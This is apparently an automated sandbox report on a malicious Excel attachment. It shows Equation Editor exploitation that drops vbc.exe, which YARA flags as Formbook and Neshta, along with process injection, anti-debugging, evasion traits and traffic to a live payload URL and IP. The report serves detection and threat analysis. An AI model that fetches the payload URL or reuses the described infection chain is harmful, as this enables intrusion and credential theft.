Source: 00000006.00000000.475402924.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000006.00000000.482711816.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
Source: 00000006.00000000.479470505.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000006.00000000.480530429.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000005.00000002.488911564.00000000030B0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000006.00000000.484429588.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000006.00000000.486527655.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000006.00000000.478490697.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
Source: 00000006.00000000.474755506.00000000001C0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14

Contains functionality to shutdown / reboot the system

Source: C:\Users\Public\vbc.exe	Code function: 5_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		5_2_004030FB
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,		6_2_004030FB

Detected potential crypto function

Source: C:\Users\Public\vbc.exe	Code function: 5_2_004047D3	5_2_004047D3
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004061D4	5_2_004061D4
Source: C:\Users\Public\vbc.exe	Code function: 5_2_73233070	5_2_73233070
Source: C:\Users\Public\vbc.exe	Code function: 5_2_732330BA	5_2_732330BA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_73235AEE	5_2_73235AEE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_73235AFD	5_2_73235AFD
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004047D3	6_2_004047D3
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004061D4	6_2_004061D4

Found potential string decryption / allocating functions

Source: C:\Users\Public\vbc.exe

Code function: String function: 00402A29 appears 51 times

Contains functionality to call native functions

Source: C:\Users\Public\vbc.exe

Code function: 5_2_73235ECC CreateProcessW,NtQueryInformationProcess,VirtualAllocEx,CreateRemoteThread,SuspendThread,

5_2_73235ECC

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Users\Public\vbc.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: Packing List.xlsx	Virustotal: Detection: 32%
Source: Packing List.xlsx	ReversingLabs: Detection: 29%

Source: C:\Users\Public\vbc.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'	Jump to behavior

Source: C:\Users\Public\vbc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\Desktop\~$Packing List.xlsx

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVREDD7.tmp

Jump to behavior

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLSX@6/20@0/1

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00402053 CoCreateInstance,MultiByteToWideChar,

5_2_00402053

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\Public\vbc.exe

Code function: 5_2_00404292 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,

5_2_00404292

Source: Packing List.xlsx

Joe Sandbox Cloud Basic: Detection: clean Score: 0

Perma Link

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: wntdll.pdb source: vbc.exe, 00000005.00000003.474355640.000000000F300000.00000004.00000001.sdmp

Persistence and Installation Behavior:

Drops PE files

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe	Jump to dropped file
Source: C:\Users\Public\vbc.exe	File created: C:\Users\user\AppData\Local\Temp\nsn3BBA.tmp\oxtrp.dll	Jump to dropped file

Drops PE files to the user directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

File created: C:\Users\Public\vbc.exe

Jump to dropped file

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\vbc.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2696

Thread sleep time: -420000s >= -30000s

Jump to behavior

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00405E93 FindFirstFileA,FindClose,	5_2_00405E93
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	5_2_004054BD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402671 FindFirstFileA,	5_2_00402671
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00402671 FindFirstFileA,	6_2_00402671
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405E93 FindFirstFileA,FindClose,	6_2_00405E93
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	6_2_004054BD

Source: vbc.exe, 00000005.00000002.488053406.00000000004E4000.00000004.00000020.sdmp

Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]

Anti Debugging:

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Users\Public\vbc.exe

Code function: 5_2_73233070 lqcuopia,GetProcessHeap,RtlAllocateHeap,memset,VirtualProtect,

5_2_73233070

Contains functionality to read the PEB

Source: C:\Users\Public\vbc.exe	Code function: 5_2_732354DA mov eax, dword ptr fs:[00000030h]	5_2_732354DA
Source: C:\Users\Public\vbc.exe	Code function: 5_2_7323581C mov eax, dword ptr fs:[00000030h]	5_2_7323581C
Source: C:\Users\Public\vbc.exe	Code function: 5_2_7323579F mov eax, dword ptr fs:[00000030h]	5_2_7323579F
Source: C:\Users\Public\vbc.exe	Code function: 5_2_732356EE mov eax, dword ptr fs:[00000030h]	5_2_732356EE
Source: C:\Users\Public\vbc.exe	Code function: 5_2_732357DE mov eax, dword ptr fs:[00000030h]	5_2_732357DE

Checks if the current process is being debugged

Source: C:\Users\Public\vbc.exe

Process queried: DebugPort

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

Injects a PE file into a foreign processes

Source: C:\Users\Public\vbc.exe

Memory written: C:\Users\Public\vbc.exe base: 1C0000 value starts with: 4D5A

Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior
Source: C:\Users\Public\vbc.exe	Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'			Jump to behavior

Source: vbc.exe, 00000006.00000002.682205793.00000000009C0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: vbc.exe, 00000006.00000002.682205793.00000000009C0000.00000002.00020000.sdmp	Binary or memory string: !Progman
Source: vbc.exe, 00000006.00000002.682205793.00000000009C0000.00000002.00020000.sdmp	Binary or memory string: Program Manager<

Source: C:\Users\Public\vbc.exe

Code function: 5_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,

5_2_004030FB

Stealing of Sensitive Information:

Yara detected FormBook

Source: Yara match

File source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Source: Yara match

File source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.227.228.38	unknown	United States		36352	AS-COLOCROSSINGUS	true

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://192.227.228.38/0078/vbc.exe	true	Avira URL Cloud: safe	unknown

AV Detection:

Multi AV Scanner detection for submitted file

Source: Packing List.xlsx	Virustotal: Detection: 32%			Perma Link
Source: Packing List.xlsx	ReversingLabs: Detection: 29%

Yara detected FormBook

Source: Yara match

File source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\Public\vbc.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe	Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 6.0.vbc.exe.1c0000.13.unpack	Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.15.unpack	Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.7.unpack	Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.9.unpack	Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.21.unpack	Avira: Label: W32/Delf.I
Source: 6.2.vbc.exe.1c0000.0.unpack	Avira: Label: TR/ATRAPS.Gen
Source: 6.0.vbc.exe.1c0000.5.unpack	Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.23.unpack	Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.17.unpack	Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.11.unpack	Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.25.unpack	Avira: Label: W32/Delf.I
Source: 6.0.vbc.exe.1c0000.19.unpack	Avira: Label: W32/Delf.I
Source: 5.2.vbc.exe.30b0000.5.unpack	Avira: Label: W32/Delf.I

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe			Jump to behavior

Office Equation Editor has been started

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source:

Binary string: wntdll.pdb source: vbc.exe, 00000005.00000003.474355640.000000000F300000.00000004.00000001.sdmp

Source: C:\Users\Public\vbc.exe	Code function: 5_2_00405E93 FindFirstFileA,FindClose,	5_2_00405E93
Source: C:\Users\Public\vbc.exe	Code function: 5_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	5_2_004054BD
Source: C:\Users\Public\vbc.exe	Code function: 5_2_00402671 FindFirstFileA,	5_2_00402671
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00402671 FindFirstFileA,	6_2_00402671
Source: C:\Users\Public\vbc.exe	Code function: 6_2_00405E93 FindFirstFileA,FindClose,	6_2_00405E93
Source: C:\Users\Public\vbc.exe	Code function: 6_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,	6_2_004054BD

Software Vulnerabilities:

Potential document exploit detected (unknown TCP traffic)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.227.228.38:80

Potential document exploit detected (performs HTTP gets)

Source: global traffic

TCP traffic: 192.168.2.22:49167 -> 192.227.228.38:80

Source: excel.exe

Memory has grown: Private usage: 4MB later: 47MB

Networking:

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS

Downloads executable code via HTTP

Source: global traffic

Uses a known web browser user agent for HTTP communication

Source: global traffic

Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38
Source: unknown	TCP traffic detected without corresponding DNS query: 192.227.228.38

Source: vbc.exe, vbc.exe, 00000006.00000000.474777707.0000000000409000.00000008.00020000.sdmp, vbc.exe.3.dr	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: vbc.exe, 00000005.00000000.468788902.0000000000409000.00000008.00020000.sdmp, vbc.exe, 00000006.00000000.474777707.0000000000409000.00000008.00020000.sdmp, vbc.exe.3.dr	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: vbc.exe, 00000005.00000002.488324538.00000000021E0000.00000002.00020000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: vbc.exe, 00000005.00000002.488324538.00000000021E0000.00000002.00020000.sdmp	String found in binary or memory: http://www.%s.comPA

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\27DB9FE4.emf

Jump to behavior

Source: global traffic

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\Public\vbc.exe

5_2_00404FC2

E-Banking Fraud:

Yara detected FormBook

Source: Yara match

File source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000005.00000002.488920647.00000000030BA000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Office equation editor drops PE file

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe			Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	File created: C:\Users\Public\vbc.exe			Jump to dropped file

Yara signature match

Source: 6.0.vbc.exe.1c0000.9.unpack, type: UNPACKEDPE	Matched rule: MAL_Neshta_Generic date = 2018-01-15, hash3 = 1954e06fc952a5a0328774aaf07c23970efd16834654793076c061dffb09a7eb, hash2 = b7f8233dafab45e3abbbb4f3cc76e6860fae8d5337fb0b750ea20058b56b0efb, hash1 = 0283c0f02307adc4ee46c0382df4b5d7b4eb80114fbaf5cb7fe5412f027d165e, author = Florian Roth, description = Detects Neshta malware, reference = Internal Research, modified = 2021-04-14
